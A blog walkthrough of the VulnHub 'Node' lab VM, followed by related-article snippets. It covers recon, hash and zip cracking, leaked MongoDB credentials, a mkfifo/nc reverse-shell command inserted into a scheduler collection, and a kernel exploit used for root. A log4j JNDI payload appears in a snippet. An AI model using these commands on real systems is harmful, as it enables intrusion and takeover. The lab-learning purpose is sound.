渗透测试--vulhub-node

最新推荐文章于 2023-11-14 15:28:55 发布
最新推荐文章于 2023-11-14 15:28:55 发布
阅读量3k 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 网络 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/123512058
版权

文章目录

安装过程

首先去官网下载node,下载mirror版本

https://www.vulnhub.com/entry/node-1,252/

然后直接创建个文件夹,VMvare导入node。

配置网络:

在vm中的编辑一栏打开虚拟网络编辑器

image-20220315155434533

打开那个更改设置,添加一个网络

最后需要在nodekali配置一个网卡,记住都要配置一个。

image-20220315155537675

kaliifconfig命令,网络配置成功

image-20220315155919645

信息收集

arp-scan扫描,获取同一个网段的可打开的主机。

arp-scan 用来发现系统和指纹识别的命令行工具

image-20220315160341577

发现192.168.79.128192.168.79.254

ping一下,128的主机存活。

image-20220315160510689

使用nmap对端口进行探测,探测出来22,3000端口打开

image-20220315162134405

获取详细的banner信息,3000,端口有用

image-20220315162344765

访问3000端口

image-20220315162801947

该web界面使用node.js编写,通过审计js源码,在“assets/js/app/controllers/home.js”这个文件中可以获取到存储敏感信息的位置/api/users/latest/ ,访问该位置

使用hash-identifier判断加密方式,为SHA-256,如下图所示:

image-20220315164112909

网上找工具解码:

img

使用任意一个口令登录,登陆后如下图所示,但是没有其他的东西了。

image-20220315164607904

这里面说Only admin users have access to the control panel currently, but check back soon to test the standard user functionality!只有管理员用户才能访问这个界面,猜想应该还有另外的管理员帐号,直接访问/api/users/ 获取到了另外一个用户

image-20220315164418596解出该用户的密码(manchester)后,登录可以下载该网站的备份源码,如下图所示

image-20220315164819473

代码审计

下载备份,看到文件内容是base64加密

image-20220315193639096

对文件进行解码

使用base64 -d 解码输出一个文件内

base64 -d myplace.backup > myplace

将文件打开看了一下,是乱码,file看一下文件类型是zip压缩包image-20220315193951427

发现是个加密文件,需要先进行破解,可以使用kali自带工具fcrackzip进行破解zip加密文件,该工具支持暴力破解和字典猜解两种方式

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace.zip

参数描述
-D指定方式为字典猜解
-p指定猜解字典的路径
-u表示只显示破解出来的密码,其他错误的密码不显示出

image-20220315194159083

输入密码,解压出源代码

image-20220315195033394

发现很多目录,因为是nodejs,所有看下他的app.js

image-20210821180335719

看到了mongodb的账号和密码,也许可以登录

账户:mark      密码:5AYRft73VtFpc84k

登录服务器

利用ssh,进行远程登录mongodb

ssh:Secure Shell(安全外壳协议,简称SSH)是一种加密的网络传输协议,可在不安全的网络中为网络服务提供安全的传输环境。 SSH通过在网络中建立安全隧道来实现SSH客户端与服务器之间的连接。 SSH最常见的用途是远程登录系统,人们通常利用SSH来传输命令行界面和远程执行命令

形式:

ssh 用户名@服务器ip地址 -p 端口号

image-20220315200438931

登录成功。但当前用户(mark)没有root权限,需要进行提权操作

image-20220315200610579

也可以登录mongo数据库

1611502574_600d93ee2384f6b78a7c0.png!small?1611502574567

这儿可以执行命令

连接MongoDB,进去scheduler数据库

mongo -u mark -p 5AYRft73VtFpc84k scheduler

image-20220315205041094

反弹shell

db.tasks.insert({cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.79.129 888 >/tmp/f"});

image-20220315205147421

成功。

提权

一般提权都是内核提权,这儿我们先确定当前系统的内核版本和系统版本

image-20220315202109830

命令描述
lsb-release查看发行的系统版本信息
arch机器的体系架构

通过查看版本信息,使用searchsploit(漏洞查询工具) 查找,可以知道该内核版本存在漏洞可以直接提权,如下图所示

image-20220315202210011

有exp,我们使用scp命令(远程文件拷贝)将payload上传至靶机

scp /usr/share/exploitdb/exploits/linux/local/44298.c mark@192.168.79.128:/tmp/

image-20220315202253657

开始提权

image-20220315202441758

成功提权为root

总结:

  1. 会利用namp和arp-scan对端口和ip地址进行扫描
  2. 得到web页面,就类似于CTF题,找突破口
  3. 然后ssh远程连接数据库服务器
  4. 利用服务器内核漏洞进行提权

参考:

https://xz.aliyun.com/t/2695

Z3eyOnd
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulhub —— Node
战神/calmness的博客
12-25 297
目录 信息收集 查看页面源码 home.js latest 用户名密码 tom 账户 users 目录 进行登录下载备份文件 暴力破解压缩密码 解压文件 内核版本提权 信息收集 root@kali:~# nmap -Pn -A -p- 192.168.19.135 Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-23 20:22 EST Nmap scan report for bogon (192.168.19...
渗透测试(一)Node渗透
weixin_42484187的博客
11-12 3578
渗透测试(一)Node渗透一、实验环境二、实验过程三、实验步骤信息收集前端代码审计解密数据提权 一、实验环境 攻击机:kali 192.168.150.131 靶机: node(https://www.vulnhub.com/entry/node-1,252/) ip未知 二、实验过程 信息收集:IP、端口 代码审计:访问api 解密数据:获得敏感信息 系统内核漏洞提权 三、实验步骤 信息收集 **扫描网段192.168.150.0/24,**获得目标ip:192.168.150.129 **扫描
Vulfocus靶场-初级】Tomcat后台弱口令+War包文件上传Getshell漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-26 3173
Vulfocus靶场漏洞,Tomcat后台弱口令,War包文件上传Getshell漏洞复现,利用冰蝎/哥斯拉进一步方便命令执行,获得flag并提交,通过tomcat靶场。
Web安全Vulfocus 靶场搭建.(漏洞集成平台)
网络安全领域___专研者.
11-14 1622
Vulfocus 是一个包含了多种漏洞靶场的镜像。每个靶场都有具体的漏洞环境和攻击点。Vulfocus 的靶场包括了 Web 安全漏洞、系统安全漏洞、网络安全漏洞、密码学漏洞等多种类型。通关这个靶场我们可以学习很多的漏洞知识和攻防方法和技巧。
vulfocus靶场安装教程
Gjqhs的博客
03-02 7441
搭建环境:虚拟机centos7,基于docker vulfocus的特性 1.启动:一键漏洞环境启动,方便简单。 2.自带 Flag 功能:每次启动 flag 都会自动更新,明确漏洞是否利用成功。 3.带有计分功能也可适用于相关安全人员能力的考核。 4.兼容 VulhubVulapps 中所有漏洞镜像。 1.挂载镜像 mkdir /mnt/cdrom:创建挂载点 mount /dev/cdrom /mnt/cdrom:镜像挂载 2.配置yum源 (1)进入yum配置.
node-v14.21.1
03-14
node-v14.21.1
milvus-sdk-node:Milvus 节点 SDK
07-24
这是milvus2-sdk-node对Milvus的基本介绍。 all 函数将返回一个 promise,因此我们可以使用 async await 来获取结果。 依赖关系 Milvus:v2.x 节点:v12+ 安装 npm install @ zilliz / milvus2 - sdk - node 先决...
node-red .zip
10-31
编写节点每行代码详解
Node-RedUI界面显示温湿度光照
10-04
Node-Red收到的Hex数据(1个字节)转化为10进制数据。
node-v10.13.0-win-x64.zip
07-06
node-v10.13.0-win-x64.zip
builder开发vu突然页面中文乱码
codezl的博客
11-14 85
点击右下角将编码值换成utf-8即可恢复正常。
Vulfocus 入门+初级
大雾
05-20 3252
名称: 命令执行漏洞 描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 flag 存放在tmp路径下 名称: vulshare/python-flag:latest 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置.
Kali+docker搭建Vulfocus靶场并配置vulfocus漏洞环境
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-25 6997
kali+docker搭建vulfocus靶场环境,并且在vulfocus靶场中添加相对应的安全漏洞环境,方便日常的渗透测试模拟、漏洞复现和安全工具有效性验证等等。最后感谢无私奉献的vulfocus工作人员和开发者。
Apache Log4j2 Vulfocus靶场环境复现
Aevery的博客
12-12 3534
Vulfocus在线靶场免费注册免费使用。在线地址: vulfocus 点击启动环境 启动后访问页面显示地地址,能成功访问即完成搭建完成 这里使用chrome的HackBar插件,直接使用POST协议随便传个参数上去访问hello页面 直接在Body插入payload,这里使用dnslog payload="${jndi:ldap://asr17t.dnslog.cn/exp}" 成功打印出dnslog信息 反弹shell替换payload即可 PS:...
vulfocus靶场搭建(实测)
热门推荐
m0_50406447的博客
07-28 3万+
vulfocus的特性 1.启动:一键漏洞环境启动,方便简单。 2.自带 Flag 功能:每次启动 flag 都会自动更新,明确漏洞是否利用成功。 3.带有计分功能也可适用于相关安全人员能力的考核。 4.兼容 VulhubVulapps 中所有漏洞镜像。 一、使用centos7作为靶机环境 1.挂载镜像 mkdir /mnt/cdrom:创建挂载点 mount /dev/cdrom /mnt/cdrom:镜像挂载 注意:这个必须已连接,否则镜像挂载失败 2.配置yum源 (1)进入y
Node.js目录穿越漏洞(CVE-2017-14849)
m0_65247093的博客
05-26 1153
影响版本(wappalyzer) Node.js 8.5.0 + Express 3.19.0-3.21.2 Node.js 8.5.0 + Express 4.11.0-4.15.5 Express框架: Express是基于Node.js平台,快速、开放、极简的web开发框架 漏洞本质: 原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(...
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9293
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
渗透测试靶场容器vulhub
weixin_42489549的博客
06-09 385
Vulhub 是预先构建的易受攻击的 docker 环境的开源集合。不需要预先存在的 docker 知识,只需执行两个简单的命令,您就有一个易受攻击的环境。 安装 在 Ubuntu 20.04 上安装 docker/docker-compose: curl -s https://bootstrap.pypa.io/get-pip.py | python3 #安装最新版本 docker curl -s https://get.docker.com/ | sh #运行 docker service sys.
MongoDB未授权漏洞
qq_45434762的博客
05-12 1038
Mongo未授权访问漏洞产生原因由于3.0版本以前MongoDB服务启用后监听地址为0.0.0.0,导致无需授权远程访问数据库利用方法mongo x.x.x.x 防御方法1、主机防火墙启用...
nodered-node-wol
最新发布
01-11
根据提供的引用内容,我找到了两个与nodered-node-wol相关的资源。下面是它们的介绍和演示: 1. nodered-node-wol仓库:您可以在以下链接中找到nodered-node-wol的仓库:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值